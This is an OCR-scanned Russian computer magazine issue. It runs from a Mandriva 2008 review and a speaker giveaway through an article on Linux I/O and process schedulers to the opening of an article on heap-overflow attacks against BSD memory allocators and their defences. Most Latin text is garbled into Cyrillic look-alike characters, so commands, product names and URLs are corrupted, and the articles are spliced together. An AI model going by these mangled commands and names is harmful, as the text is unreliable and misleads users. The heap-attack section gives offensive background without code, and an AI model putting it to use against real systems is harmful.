онная версия системы, требующая установки на жесткий диск. Она 
содержиттолько свободное, открытое программное обеспечение, здесь 
также нет некоторых кодеков, проприетарных драйверов и плагинов. 
Версия Ргее распространяется на одном 0Ѵ0- или на трех Сй-дисках; 
есть вариант как для 32-, так и для 64-битных платформ. 

В появившемся после инициализации меню всего три вспомогатель- 
ных подпункта Р1 -3, а выбор варианта загрузки один — Вооі: Мапбгіѵа 
Ыпих 2008. Такого многообразия, как в ОрепЭУЭЕ, нет. Поэтому в случае 
возникновения проблем пользователю Мапбгіѵа Опе все нужные 
параметры придется вбивать руками. Возможно, конечно, что это из- 
держки І_іѵеСО-варианта, который больше подходит для тестирования. 
Далее тебя встретит мастер, который на выбранном языке задасттебе 
несколько вопросов. В комплект Мапбгіѵа Опе включены 30 рабочие 
столы Сотріг-Ризіоп и Мебззе, на последнем шаге мастера предстоит 
выбрать между одним из этих вариантов и обычным рабочим столом. 
Рабочий стол в новой версии Мапбгіѵа традиционен, ничего необыч- 
ного разработчики не придумали. Может, оно и к лучшему. В отличие от 
версии 2007 с ярко оранжевой темой Іа Ога, в 2008 использован спокой- 
ный темно-синий цвет. На рабочий стол помещено несколько ярлыков. 



Кроме доступа к домашнему каталогу, корзине и устройствам хранения 
здесь есть ярлык 1_іѵе Іпзіаіі, позволяющий установить дистрибутив на 
диск. В панели задач размещены четыре апплета. Интересен апплет 
настройки сетевых устройств, предназначенный для настройки всех 
видов подключений, для которой вызывается соответствующее окно 
ОгакСопР Двойной щелчок мышкой по ярлыку запустит «Сетевой 
центр» (бгакпеРсепРег), в котором также можно настроить параметры 
ЕЙіегпеІ-карт и просмотреть статистику их работы. При настройке 
соединения с интернетом проблем не возникает. 

Пункт «Ітрогі: ѴѴіпбоѵѵз боситепіз апб ЭеШпд» в ОгакСопр в подме- 
ню «Система», позволит импортировать настройки и документы из 
ѴѴіпбоѵѵз. Письма из ТЬе ВаН он вряд ли скопирует, а вотобои рабоче- 
го стола и некоторые мелочи — вполне возможно. Меню программ в 
большинстве своем локализованы полностью. Для настройки эффектов 
Сотріг-Ризіоп в разделе «Утилиты» ты найдешь СотрііСопбд 5еРІі пд 
Мападег; пунктов в нем предостаточно, поэтому в ближайшие несколько 
вечеров тебе будет чем заняться. Для переключения между вариантами 
рабочего стола разработчики предлагают использовать фирменную 
утилиту б га кЗб. Вообще в Мапбгіѵа к манипуляции с 30-столами подо- 
шли серьезнее остальных. При загрузке система находит все разделы 
жесткого диска и автоматически монтирует их при первом обращении. 
Следует отметить, что поддерживается запись в раздел с ЫТР5 (пИв-Зд). 
Хотя если раздел І_іпих или РАТ32 можно смонтировать под обычным 
пользователем, то в случае с ЫТР5 понадобятся права гооС 
Установка дистрибутива на жесткий диск по-прежнему проста и вызвать 
какие-либо трудности у мало-мальски подготовленного пользователя 
не должна. Мастер даже стал еще проще в обращении. Кстати, нажатие 
на кнопку «Форматировать» отформатирует раздел в ПеізегРБ без 
лишних вопросов и предупреждений. Раньше о возможности потери 
данных предупреждали хотя бы ради приличия. Чтобы указать другой 
тип файловой системы, необходимо переключиться в режим эксперта. 
Файловая система ЭдиазЬРЭ, использующая сжатие, вероятно, позво- 
лила включить все л окал и и добавить, по сравнению с предыдущей 
2007-й версией, дополнительные приложения. Поэтому в Мапбгіѵа Опе 
есть все, что нужно на первое время любому пользователю, □с 



Примечание 

редактора 

Чтобы исключить предвзятость автора, в наш обзор не попала новая 
версия одного из самых популярных Ілпих-дистрибутивов — КіЛшпШ 
7.10, вышедшая 18 октября под кодовым названием СШзу СіЬЬоп 
(Бесстрашный Гиббон) . Однако о тех возможностях, которые были 
включены в этот релиз, мы никак не можем умолчать: 

• КБЕ 4 ТесЬпісаІ Ргеѵіеѵѵ; 

• настольная поисковая система Зітіді; 

• КезШсІіеб Мапа§ег, облегчающий установку собственных уникаль- 
ных драйверов; 

• быстрое переключение пользователей; 

• удобное управление плагинами Рігеіох; 

• управление свойствами экрана в графическом режиме; 

• автоматизация установки принтеров; 

• автоматическая установка микропрограммного ПО сетевых карт 
Вгоабсот; 

• улучшение работы менеджера проприетарных драйверов; 

• запись на разделы с файловой системой ШТЗ «из коробки»; 

• улучшение работы с батареями ноутбуков; 

• шифрование жестких дисков. 

А также множество других мелких улучшений, облегчающих жизнь 
какдомашнему, так и корпоративному пользователю. 
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ІПод новый год спешим тебя обрадовать еще 



СкЕАТІѴЕ 

СОЫТЕЗТ 




сом. На этот раз ѵ тебя есть 



возможность завладеть классными колонка- 



ми от компании Сгеаііѵе: мы разыгрываем 



Іпзріге ТІО, СіяаѴѴогкз Т20 и СіяаѴѴогкз Т40. 



Чтобы завладеть этими крутыми призами, придется ответить на 5 не самых сложных вопросов о разыгры- 
ваемых колонках. Но не переживай, мы не будем сильно грузить твой мозг под новый год. Просто ответь на 
вопросы, и если будешь первым из девяти - получишь приз. 




|6ідаѵѵогк5Т20| 



|Оідаѵѵогксі Т40, 



Итак, вопросы: 

Л Какую форму имеют широкополосные динамики в Ѳідаѵѵогкз Т20? 

Л Из чего выполнены, и какую форму имеют высокочастотные твитеры в Т40? 

ЦБлагодаря чему небольшие колонки ІпзрігеТЮ выдают столь впечатляющие для этих размеров басы? 
Л Как по-твоему, сильноли отличаются вес и объем левой и правой колонокв Ѳідаѵѵогкз Т20? 

Л Какую длину имеет кабель для мини-разъема, идущий в комплекте с Іпзріге Т1 0? 



Свои ответы присылай на ящик сгеаІіѵеГЭгеа I. хакер, г и до 20 января. 



СГСИЛТІѴ 
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ЗНАКОМИМСЯ С ПЛАНИРОВЩИКАМИ І_ЩЦ 



ВЛАДИМИР 

/ Ѵ.ТІЛ)ВШ 



Позови 



пингвина 



на планерку 



Сердцем любой операционной системы 
является ядро, от реализаций имеющихся 
функций в котором зависит очень многое. 
Это не только поддержка разнообразных 
устройств и файловых систем, но и рас- 
пределение системных ресурсов. А так как 
требования, предъявляемые к планирова- 
нию ресурсов, на каждом десктопе/серве- 
ре/маршрутизаторе/мобильнике с Ілпих 
существенно различаются, разработчики 
наперебой предлагают планировщики, аль- 
тернативные штатным. 



Н ПЛАНИРОВЩИКИ ВВОДА/ВЫВОДА 

В любой системе можно выделить два типа планировщиков: планировщики 
ввода/вывода и планировщики процессорного времени. Планировщики вво- 
да/вывода (1/0 зсбесМег) являются интерфейсом между блочными устройства- 
ми и драйверами низкого уровня. Задача такого планировщика — оптимальным 
образом обеспечить доступ процесса кзапрашиваемомудисковомуустройству. 
Несмотря на кажущуюся простоту вопроса, это настоящая проблема. Ведь 
работа с дисками относится кочень медленным операциям, поэтому ал го ритм 
1/0-шедулера должен обеспечивать решение часто противоречивых задач: 

— минимизация времени поиска информации на диске; 

— выдача информации в соответствии с приоритетом; 

— гарантия получения данных приложением за определенное время и в 
определенном количестве. 

Многократное переключение между задачами приводит ктому, что головка 
диска большую часть времени просто переходит на разные позиции. Имен- 
но поэтому в последнее время используются так называемые конвейерные 
(еіеѵаіог) механизмы, в которых данные считываются не в порядке поступ- 
ления запроса (вроде РІРО, І_ІР0 и других), а с ближайших секторов. 



Планировщик ввода/вывода ядра 2.4 использует один сложный конвейер 
общего назначения. Хотя он и имеет достаточное количество парамет- 
ров, позволяющихуправлять временем ожидания запроса в очереди, его 
возможностей часто не хватает для более тонкой настройки под специфи- 
ческие задачи. После многочисленных дискуссий, экспериментов и патчей 
в ядро 2.6 было включено четыре разных планировщика ввода/вывода, и 
теперь пользователь в зависимости от конкретных задач может подобрать 
себе наиболее оптимальный. Чтобы узнать, какие планировщики 1/0 вклю- 
чены в ядро, достаточно ввести команду: 

$ сЗтезд I дгер зсЪесІиІе 

[1.348000] іо зсііесіиіег поор гедізбегесі 

[1.348000] іо зсЬесІиІег ап^ісіраЪогу гедізЬегесІ 

[1.348000] іо зсііесіиіег сіеасіііпе гедізбегесі 

[1.348000] іо зсЬесІиІег сбд гедізбегесі (йе^аиІЬ) 

Как видишь, в моем КІЧЬипіи присутствуют все четыре. Алгоритм СРО отме- 
чен как используемый поумолчанию, причем так обстоят дела практически 
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во всех современных дистрибутивах с ядром старше 2.6.18. Поэтому с него и 
начнем наше знакомство. 

Сотріеіеіу РаігОиеиіпд (СРО) появился какрасширение кБРО (зІюсНазбс 
(аігдиеиіпд) — планировщику, предназначенному для работы с сетевыми 
пакетами. СРО был включен в ядро 2.6.6 в апреле 2004 года. В СРО (и БРО] 
для каждого процесса поддерживается своя очередь ввода/вывода, а 
задача планировщика состоит втом, чтобы как можно равномернее распре- 
делять запросы в доступной полосе пропускания. Поэтому СРО идеально 
подход ит для тех случаев, когда множество программ требует доступ к диску, 
а также для многопроцессорных систем, где необходима сбалансированная 
работа подсистемы ввода/вывода с различными устройствами. 

За период развития ядра 2.6 алгоритм СРО несколько раз совершенствовал- 
ся, и сегодня доступна его четвертая версия. В ней применен принцип бте 
зіісе, аналогичный используемому в планировщике процессов, поэтому он 
стал несколько похож на Апбсіраіогу. Время, выдаваемое каждому процессу 
на работу с устройством, и числозапросовтеперьзависяти отприоритета. 
ПланировщикМООР — самый простой планировщик, потребляющий 
минимальное количество ресурсов. Он выполняет простые операции 




объединения и сортировки. Фактически его реализация представляет собой 
очередь РІРО (Рігзі I п, Рігбі Оиі). Другими словами, он просто выставляет 
запросы в очередь втом порядке, в котором они пришли. В основном ЫООР 
используется для работы с недисковыми устройствами (например, ОЗУ или 
флешками] или со специализированными решениями, имеющими свой 
собственный планировщик 1/0 и требующими минимальной помощи ядра. 

В этом случае применение РЮОРуменьшает нагрузку на процессор, а его 
простота дает ему преимущество перед остальными планировщиками. 
Задача алгоритма ОеасІІіпе — минимизация задержек ввода/вывода и 
обеспечение поведения, близкого к реальному времени. Дляулучшения 
производительности планировщик использует алгоритм предельного 
срока, постоянно переупорядочивая запросы. Суть алгоритма заключается 
втом, что операциям чтения всегда отдается предпочтение перед опера- 
циями записи. Поумолчанию операция чтения будет выполнена максимум 
через 500 мс, записи — через 5 с. Из очереди извлекается следующий про- 
цесс, который и получает практически монопольный доступ к ресурсу; затем 
он переводится в состояние ожидания, а планировщиквыбирает следую- 
щую программу. Появившись в 2002 году, этот алгоритм сразу был включен в 
стабильную ветку ядра. ОеасШпе больше подходит для систем, где количест- 
во считываемой информации превосходит количество записываемой, 
например для баз данных или веб-серверов. При больших последователь- 
ных операциях чтения этот планировщик превосходит СРО. Теоретически 
для десктопа он подходит меньше, так как, пока один процесс пользуется 
диском, все остальное практически замирает. Хотя если ты любишь слушать 
музыку и смотреть фильмы, а жесткий диск не самый быстрый, то, вероятно, 
тебе стоит внимательно присмотреться к это му алгоритму. 

В планировщике Апбсіраіогу (упреждающий конвейер], который основан 
на ОеасШпе, пытаются минимизировать перемещение головки подиску. 

Для этого перед запросом вводится управляемая задержка. Таким образом 
достигается переупорядочение и объединение операций обращения кдис- 
ку. Поэтому есть вероятность того, что предыдущий запрос успеет получить 
нужные данные до того, как головка диска будет вынуждена перейти на но- 
вый сектор. Однако результатом работы Апбсіраіюгу может быть увеличение 
задержки выполнения операций ввода/вывода, поэтому его лучше всего 
использовать на клиентских машинах с медленной дисковой подсистемой, 
для которых более важна интерактивность работы, чем задержки вво- 
да/вывода. Этот алгоритм применялся поумолчанию в ядрах 2.6.0 - 2.6.1 7. 
Кстати, при его использовании в некоторых ситуациях веб-сервер АрасЬе 
показывал большую производительность (на 50%), чем при применении 
других алгоритмов. 

Чтобы увидеть все алгоритмы в новом ядре при самостоятельной пересбор- 
ке, не забудь включить следующие параметры: 

$ дгер ІОЗСНЕВ . сопРід 

СОЫЕІС_ІОЗСНЕВ_ЖЮР=у 

С(ЖЕІС_ІОЗСНЕВ_АЗ=у 

С(ЖЕІС_ІОЗСНЕВ_ВЕАВЫЫЕ=у 

С(ЖЕІС_І05СНЕВ_СР<2=у 
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С0ЫРІС_ВЕРАиЬТ_І03СНЕБ= " сід" 

Какты понимаешь, последний параметр определяеталгоритм, который 
будет использоваться по умолчанию. В ядрах до версии 2.6.18 дефолтным 
стоял апбсіраіогу. 

Переключить один планировщик на другой очень просто. Для этого следует 
добавить параметр еіеѵаіог, передаваемый ядру при загрузке, с указанием 
алгоритма — аз, сіеасіііпе, поор или с^. Хотя в порядке эксперимента можно 
попробовать изменить алгоритм на лету, записав в файл /зуз/Ыоск/<Ыоск_ 
беѵісе>/риеие/зсЬесІиІег нужную строку: 

$ саР /зуз/ьіоск/зсіа/диеие/зсііесіиіег 
поор апЪісіраЪогу сіеасіііпе [сід] 

Меняем СРО на Апбсіраіогу: 

$ есЪо апЦісірабогу > /зуз/Ыоск/зйа/диеие/зсЬесіиІег 

Выбранный планировщиквступитв действие не сразу, а через некоторое 
время. С выходом СРО ѵЗ в І_іпих2.6.13 появилась возможность выстав- 
лять для процессов приоритеты использования дисковой подсистемы, 
чего раньше не хватало. Подобно утилите пісе, которая задействуется 
для назначения приоритетов использования процессора, приоритеты 
ввода/вывода указываются при помощи іопісе. В ІІЬипІи она входит в пакет 
зсбесіибіз. Синтаксис команды прост: 

іопісе -с класс -п приоритет -р РІБ 

Приоритет — число отО до 7 (чем меньше число, тем больше приоритет). В 
позиции «Класс» возможны три значения: 

• 1 (Веаібте) — планировщикдаетвыбранному процессу преимущество 
при доступе кдиску без обращения внимания на работу других процессов. 
Доступно восемьуровней приоритета (0-7); 

• 2 (Везі ЕНоіі) — класс, устанавливаемый поумолчанию для всех процес- 
сов; доступны те же восемьуровней приоритета; 

• 3 (Ісііе) — процесс получаетправо на использование жесткого диска 
только в том случае, если другая программа не требует диска; приоритеты 
на этом уровне не используются. 

Вместо РЮ можно указать имя процесса: 

$ зисіо іопісе -с2 -пО хіпе 

Для эксперимента запустим программутестирования бЬепсЬ с имита- 
цией работы 50 клиентов: бЬепсЬ -1: 60 50. Получаем: СРО — 88,02 Мб/с, 
Апіісіраіогу — 81 ,14 Мб/с, Оеасіііпе — 134,66 Мб/с, ЫООР — 63,15 Мб/с. 
Результат понятен и без комментариев, но однозначно сказать, какой 



алгоритм лучше, довольно сложно. Хотя ОеасІІіпе и обогнал все остальные, 
попробуй в это время запустить Агпагок или сохранить скрин — придется 
чуток подождать. 

г ПЛАНИРОВЩИКИ ПРОЦЕССОВ 

Важной задачей по обеспечению нормальной работы любого сервиса, 
помимо доступа к дисковым устройствам, является также доступ к процес- 
сору. За распределение процессорного времени между работающими при- 
ложениями отвечают другие планировщики. На первый взгляд это простая 
задача, но, так как на современных компьютерах могут выполняться сотни, 
ато итысячи процессов, неправильная реализация планировщика может 
снизить общую производительность системы (учти, что даже на переклю- 
чение контекста процесса тратится немало драгоценного времени). Кроме 
того, планировщик постоянно сталкивается стакой проблемой, какограни- 
чение времени ответа для критических задач, рьяно борющихся за СРВ. 
Долгое время в І_іпих присутствовал один шедулер — 0(1 ). Да, были и 
другие предложения, вроде Зіаігсазе от Кона Коливаса (зсбесі-зіаігсазе- 
1 7. 1 . раісИ) и Раігзсбесі Ы.пер/рп^еЩзЛаігзсЬесІ), в котором процессы раз- 
биты на группы, а стандартный планировщик гарантирует распределение 
времени взависимости отвеса группы. Но всеони не попадали восновную 
ветку ядра. Сегодня наметилась явная активность разработчиков в этом 
направлении. Сообщения о новых реализациях появляются на КегпеІІхар 
чуть ли не ежемесячно. 

Стандартному планировщику 0(1) в этом году исполнилось 15 лет. В июле 
1993 года Л и нус То рвал ьдс описал принцип работы планировщика задач 
І_іпих. Оригинальный файл зсЬеб.с содержал всего 254 строк кода, это был 
простой и понятный алгоритм. В 1 996 году в нем было уже более 6000 строк 
— Дэйв Гротустранил проблему с семафорами и 5МР-системами. 2002 год 
был отмечен появлением «иІіха-зсаІаЫе 0(1) зсбесіиіег» от Инго Молнара. 

В настоящее время зсбесі.с содержитуже более 7000 строк. 

Алгоритм работы 0(1) очень прост. Каждая задача имеет фиксированное 
число (бек), которое пересчитывается с каждым системным тиком (по 
умолчанию 100 Иг) при выходе из режима ядра или при появлении более 
приоритетной задачи. Алгоритм делит число на 2 и добавляет базовую 
величину (поумолчанию 15сучетом величины пісе). Когда тик становится 
равным нулю, процесс устанавливает флагпеесІ_ге5сЬесІ итикпере- 
считывается. Кроме этого, каждый процесс имеет две очереди. В одной 
находятся готовые кзапуску задачи, во вторую помещаются отработавшие 
и спящие задачи, которые, например, ожидают недоступный в настоящее 
время ресурс. Когда первая очередь пустеет, очереди меняются местами. 
Поэтому время работы алгоритма постоянно и не зависит от количества 
процессов. Современная реализация 0(1) использует более сложные 
алгоритмы (например, анализируя среднее время сна), чтобы обнаружить 
интерактивные процессы и постараться задержать их в активном дереве. 

В ядро 2.6.23 в качестве основного был включен планировщикСРЗ 
(Сотріеіеіу РаігБсЬесІиІег — абсолютно справедливый планировщик), над 
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которым работает Инго Молнар. В нем для хранения процессов использует- 
ся геб-Ыаск дерево, где ключом является значение ѵѵай:_гип1:іте каждого 
процесса. Эта переменная определяет количество наносекунд, которое 
переработал или недоработал процесс. В зависимости от этого значения 
процесс и получает свое место в дереве. В СР5 используются наносекунды, 
а небгпе зіісез илитики; в его работе нет никакой эвристики. Извлечение 
процесса и его вставка в деревотребуют перестройки, что при большом 
количестве процессов приводит кувеличению накладных расходов. Поэ- 
тому СР5 рекомендуется в первую очередь для десктопов, где нет большого 
количества одновременно запущенных процессов. В отличие от 0(1), СР5 
равномернее планирует процессорное время (фактически если задачи две, 
то каждая получит ровно 50% СРІІ), распределяетзадачи по нескольким 
ядрам и имеет меньшее время отклика. Для настройки СР5 используется 
файл /ргос/5у5/кегпеІ/5сЬесІ_дгапиІагіІу_п5, в котором по умолчанию уста- 
новлен режим сіезкбор (меньшее время задержки), но при необходимости 
его можно переключить в зегѵег, обеспечив лучшую группировку. 

Патч СР5 для ядер >=2.6.20 можно взять по адресу реорІе.гесІбаЕсопп/ 
тіпао/сіз-зсЬесІиІ.ег . Далее качаем сорцы ядра и накладываем патч (обрати 
внимание, что ѵ22 отражает версию патча СР5; планировщик находится 
в постоянном развитии, поэтому следует выбирать последнюю доступную 
версию): 

$ сді /изг/згс/ііпих 

$ рабсЪ -рі < ~/зс!іе(5-сРз-ѵ2 . 6 . 22 . 9-ѵ22 .рабсЬ. 

Стоит отметить появление новых параметров: 

СОПРІС_ЕАІК_СКОІІР_5СНЕВ=у 

СОЫРІС_РАІК_ІІЗЕК._ЗСНЕВ=у 

СОЫРІО_ЗСНЕБ_Ш_Ш_ОМІТ_РЕАМЕ_РОЮТЕЕ=у 

СОМРІС_ЗСНЕВ_БЕВІГС=у 

После конфигурирования собираем ядро обычным образом. 

Утилита ЬаскЬепсб ( сІеѵеІорег.озсІІ.ога/сгаіаег/І'іаскЬепсЬ/згс/ЬаскЬепсб.с ). 
измеряющая скорость создания указанного числа процессов и скорость 
обмена данными между ними, со стандартным планировщиком показывает 
результат 6,5, а с СР5 — 5,9. Если эти цифры тебе ничего не говорят, воттебе 
пример. После запуска теста сопіезі: (он есть в репозитарии ІЛэипіи) при ис- 
пользовании 0(1) Атагок загружался минуты две и постоянно прерывалась 
музыка, а при СР5 Атагок запустился и работал как ни в чем не бывало. 

Кон Коливас, остановив разработку ветки ск, в марте анонсировал совер- 



шенно новый планировщик Р50І_ (Робабіпд Зіаігсазе ОеасИ_іпе зсбесМег), 
который впоследствии был переименован в (Зіаігсазе ОеасІІіпе, 
ск.коІіѵаз.огд/раісЬез/зІаігсазе-сІеасІІіпе ). За его основу был взятЗіаігсазе. 
Задача нового планировщика — исключить зависания, присущие 0(1). 
Здесь все процессы равны, каждому выделяется своя квота, исчерпав 
которую, он опускается на следующий уровень приоритета, где получает 
новую квоту. Причем каждый уровеньтакже имеет свою квоту. Если ее 
исчерпаетхотя бы один процесс, все перейдут на следующий уровень неза- 
висимо оттого, отработали ли они свою квоту или нет. Планировщиктакже 
пытается определить интерактивные процессы, автоматически повышая 
им приоритет. Версия 50 показывала неплохие результаты на серверах, 
и поговаривали, что этот планировщик будет включен в основную ветку, 
начиная с 2.6.22. Но из-за проблем со здоровьем Коливаса разработка шла 
относительно медленно, и Инго Молнар обогнал соперника. 

Посетовав на сложность СР5, Роман Зиппель представил рабочий прототип 
базового алгоритма нового планировщика РР5 (Пеаііу РаігЗсЬесІиІег, 
кегпеигар.ога/РР5 ). который помещаетзадачу в виртуальную (нормализо- 
ванную) временную линию, где имеетзначениетолько относительное рас- 
стояние между двумя любыми задачами. Послежарких споров вответна 
это Инго Молнар представил свою версию планировщика, реализованную 
поверх СР5 и включающую алгоритм из РР5. Он назвал ее Р5РР5 (Реаііу 
Зітріе Реаііу РаігЗсЬесІиІег). 

За последние 2,5 года было предложено около 300 различных алгоритмов, 
такчто в ближайшее время на этом фронте врядли будетспокойно :). пг 



Проект БезкОрі: 

Интересный проект был представлен в списке рассылки разработчиков 
ядраЬіпііх. Программа БезкОрі: Гтѵш.зГагбизІі.ѵѵеЬра^ез.рІ/ШезАооІз/ 
безкорЕ) — это демон, написанный на языке высокого уровня РуЛоп, 
который отслеживает запускаемые пользователем приложения и 
автоматически выбирает оптимальные параметры работы планиров- 
щика процессов СР5 и планировщика ввода/вывода (СР(^, апгісіраногу, 
беасИіпе) . Все настройки осуществляются путем редактирования 
конфигурационного файла, в котором по умолчанию описано три 
класса оптимизации: игры, просмотр видео и прослушивание музыки. 
ПезкОрІ: легко устанавливается и, судя по тестам, дает прирост произ- 
водительности, особо ощутимый в играх. 
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ТЕХНИКА ПЕРЕПОЛНЕНИЯ КУЧИ В РРЕЕ/І 



МЕТ/0РЕЫВ50 



^Атакуем 

кучу вхВБР 



Атаки на кучу (она же динамическая память) приобретают 
все большую популярность, но методы переполнения, опи- 
санные в доступных хакерских руководствах, по ходу дела 
оказываются совершенно неработоспособными. Рассчитан- 
ные на древние системы, они не в курсе, что в новых версиях 
все изменилось. Более того, Ргее/МеІ/ОрепВБО используют 
различные стратегии защиты кучи, особенности строения 
которой необходимо учитывать при написании эксплойтов. 
Мыщъх проделал титаническую работу, исследовав все вер- 
сии популярных В80-систем, и теперь не успокоится, пока не 
поделится добытой информацией с читателями. 



Н ВВЕДЕНИЕ, ИЛИ КАК ВСЕ ЭТО НАЧИНАЛОСЬ 

Сезон переполняющихся куч начался со статьи «Опсе ироп а ітееО», опуб- 
ликованной анонимусом в 396 номере рбгаск’а (8 января 2001 года), ссы- 
лающимся на более раннюю работу известного хакера Воіаг’а Оезідпег’а 
(датируемую 25 июля 2000 года), в которой тот описал механизм передачи 
управления на збеіі-код, использующий особенности реализации макроса 
ипііпк в библиотеке дІіЬс-2.2.3, поставляемой вместе с 1_іпих. До этого ха- 
керам было известно лишь стековое переполнение с подменой адреса воз- 
врата из функции. Переполнение кучи в общем случае приводило лишь к 
бездумному разрушению служебных структур динамической памяти и краху 
уязвимого приложения. Новый класс атак открывал радужные перспективы 
непаханой целины, и обозначенная статья приобрела огромную популяр- 
ность, породив кучу перепечаток в различныхтуториалах и езинах. 

В конце июля 2002 года на Сеть обрушился червь Віаррег, поражаю- 
щий І_іпих-боксы и распространяющийся путем переполнения кучи 
через ошибку переполнения стека в 0реп55І_. К ВВО-системам такой 
механизм оказался неприменим в силу существенных конструктивных 
отличий строения кучи. Но уже 14 мая 2003 года хакер по кличке ВВР 
рассказал, как атаковать аллокатор, разработанный фришным програм- 
мистом по имени Роиі-Неппіпд Катр, (далее по тексту рбк-ал локатор). 



Когда рбк-аллокатор стал использоваться в Егее/Ыеі/ОрепВВВ в каче- 
стве основного (теперь же он остался только вЫ е1:-и0 реп ВВй, причем 
в ОрепВВО — в сильно переработанном виде), старыетрюки прекратили 
работать и молодые хакеры, начитавшиеся различных статей, сели на 
полный облом, завалив мыщъх’а грудами писем с вопросами: почему 
это не работает, кактеперь жить и что делать? Вердикт: курить гіТт, 
конечно, полезно, но реальную пользу дают только свои собственные 
исследования, особенно в наш бурный век, когда опубликованные 
методы атаки теряют актуальность в течение нескольких месяцев. Так 
вот насчет исследований. 

В конце 2005 года хакер под ником РЬапІавтаІ РЬапІавтадогіа написал 
статью «Тбе Маііос Маіебсагит ОІіЬс Маііос Ехріоііабоп ТесЬтциез», в 
которой предлагались новые механизмы атаки, пробивающие діібс версии 
2.3.5 и выше. Статья остается актуальной по сей день, пусть и не без коррек- 
ции с учетом рандомизации адресного пространства, сторожевых страниц и 
других новомодных защитныхтехнологий, появившихся в начале 2006 года. 
В середине 2006 года Веп Наѵѵкез выступил на конференции ВехСоп 
с презентацией «ЕхрІоіОпд ОрепВВО», в которой показал, какатако- 
вать кучу самой защищенной операционной системы всех времен и 
народов. Разработчики ОрепВВО довольно оперативно отреагировали 
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на ситуацию, выпустив обновленную версию аллокатора, затыкающую 
часть дыр. Разработчики Ргее- и ЫеШББ чешутся до сих пор, так что для 
хакерства складывается весьма благоприятная ситуация. 

Мыщъх не предлагает готовых рецептов, но зато указывает на направление, 
двигаясь в котором можно подломатьтекущие и последующие версии алло- 
каторов нетолько в Егее/Ыеб/ОрепВБО-системах, но и в І_іпих, ненавистной 
всем Висте и новоявленном І_опдЬогп'е (он же 5егѵег2008). 

^ ОБЗОР НОВЫХ ЗАЩИТНЫХ ТЕХНОЛОГИЙ 

Прежде чем погружаться в омуттехнических подробностей, совершим 
беглый обзор новейшихаллокаторов, обозначив ключевыетехнологии и 
ответив на вопрос, почему существующие эксплойты перестали работать. 

Изменение структур данных 

Неар втазЬес! эксплойты вынуждены работать с низкоуровневыми 
структурами данных, поддерживающими жизнеобеспечение кучи, причем 
эти структуры не остаются постоянными, а меняются от версии к версии в 
целях нетолько защиты, но и элементарной оптимизации. Поэтому, чтобы 
заставить эксплойт работать, необходимо установить версию аллокато- 
ра, используемую жертвой, скачать исходные тексты (а в случае ѴѴіп б оѵѵз 
засесть за дизассемблер) и соответствующим образом скорректировать код 
эксплойта. Если же версию аллокатора установить не удается (а удаленно 
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э андомизация адресного пространства в ОрепВБО 

ееустановить очень сложно), следует поочередно перебирать все версии 
одну за другой. 

Рандомизация адресного пространства 

Эксплойты прежнего поколения закладывались на абсолютные адреса, по 
которым были расположены ключевые структуры данных, указатели и дру- 
гая информация, пригодная для затирания. Теперьже затереть ее нетак-то 
просто, поскольку операционные системы нового поколения активно 
используют рандомизацию адресного пространства (Аббгезв Брасе І_ауоиІ 
Вапботігабоп, или сокращенно АББЕ), меняя стартовые адреса библиотек 
и служебных структур динамической памяти случайным образом. ОрепВБО 
и Виста используют рандомизацию кучи поумолчанию, в ЫеіВБО она до 
сих пор не реализована, а разработчики РгееВБО в последних версиях 
отказались от ее использования в пользу производительности, так что 
реальную угрозу для хакерства рандомизация представляеттолько на 
ОрепВБО (рынок которой относительно невелик) и на Висте/І_опдЬогп’е. 

Сторожевые страницы 

Для предотвращения переполнения блоки памяти, занимающие свыше4 Кб, 
окружены сторожевыми страницами, попытка доступа к которым вызываетис- 
ключение. Однако блоки памяти меньше 4 Кб остаются незащищенными (в про- 
тивном случае расходы памяти оказались бы просто немыслимыми), и ктомуже 
внутри блоков память никак не защищена. То есть если мы имеем структуру вида 
«вІгисШсбагЬиШхЮ]; іпІ*х; іпІ*у}», то перезаписьуказателейхиу по-прежне- 
му остается возможной! Сторожевые страницы в настоящий момент реализова- 
ны только в ОрепВБО (смотри \ллл/ѵѵ.орепЬ5б.ога/рарег5/аииа04/гпар00023.Ы:гп[ ). 
но даже в ней они могутбыть выключены для экономии памяти. 

Контроль целостности кучи 

Практически все современные аллокаторы в той или иной мере контроли- 
руют целостность служебных структур динамической памяти, предотвра- 
щая их затирание при переполнении, однако, зная алгоритм проверки, 
мы можем засунуть в затертые структуры подложные данные и... никто 
ничего не заметит! Как вариант — мы можем найти в куче указатель на блок 
памяти, передаваемый функции ітее(), и заменить его указателем на свой 
собственный блок, содержащий поддельную структуру данных. 

Обфускация указателей 

Для предотвращения чтения/записи указателей прибегают к их«шифров- 
ке» командой ХОР. Указатели хранятся в памяти в зашифрованном виде и 
расшифровываются только перед непосредственным использованием, а 
потом шифруются вновь. В настоящий моментэтотзащитный механизм ре- 
ализуюттолько Бегѵег2008 и новые версии компилятора ѴС. Разработчики 
хВБО отказались от обфускации указателей ввиду чрезмерных накладных 
расходов, хотя ОрепВБО позволяет включить обфускацию (поумолчанию 
она выключена). 
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таііос.с на СѴ5-дереве РгееВБР 



г ИСТОРИЯ 

Главная сложность атаки на кучу заключается в огромном количестве вер- 
сий аллокаторов, каждая из которых требует индивидуального подхода, 
поэтому очень интересно было бы проследить этапы развития аллокаторов 
во Ргее/Ыеі/ОрепВБО-системах. Полный перечень изменений занял бы 
пару десятков страниц и был бы таким же скучным и труднопроходимым, 
как«Капитал» Маркса (часто используемый в качестве снотворного]. К 
счастью, приводить его здесь нет необходимости, поскольку эта инфор- 
мация уже представлена в удобочитаемом виде на официальных сайтах 
В50-систем. СѴБѴѴеЬ (ѵѵеЬ-интерфейс для СѴ5-хранилищ) просто незаме- 
ним, когда требуется изучить хронологию эволюции отдельного файла — в 
данном случае таііос.с, который доступен по следующим адресам: 

• РгееВЗР: ѵ\лллл/ігееЬзб.огд/сді/сѵ5ѵѵеЬ.сді/5гсЛіЬ/ІіЬс/5ІбІіЬ/таІІос.с . 

• ЫеіВЗР: сѵзѵѵеЬ.пеіЬзб.ога/ЬзбѵѵеЬ.саі/згс/ІіЬ/ІіЬс/зІсІІіЬ/гпаІІос.с . 

• ОрепВВРі ѵѵѵѵѵѵ.орепЬзб.ога/саі-Ьіп/сѵзѵѵеЬ/Бгс/ІіЬ/ІіЬс/вІбІіЬ/таІІос.с . 

Мы же сосредоточимся только на «судьбоносных» изменениях, связанных с 
введением в строй новых защитных механизмов, а модернизацию служеб- 
ных структур динамической памяти оставим за кадром. 

^ РКЕЕВ5Р 

Ранние версии РгееВЗР использовали простой и тормозной аллокатор, 
написанный в 1982 году программистом по имени Сбгіз Кіпдзіеу и условно 
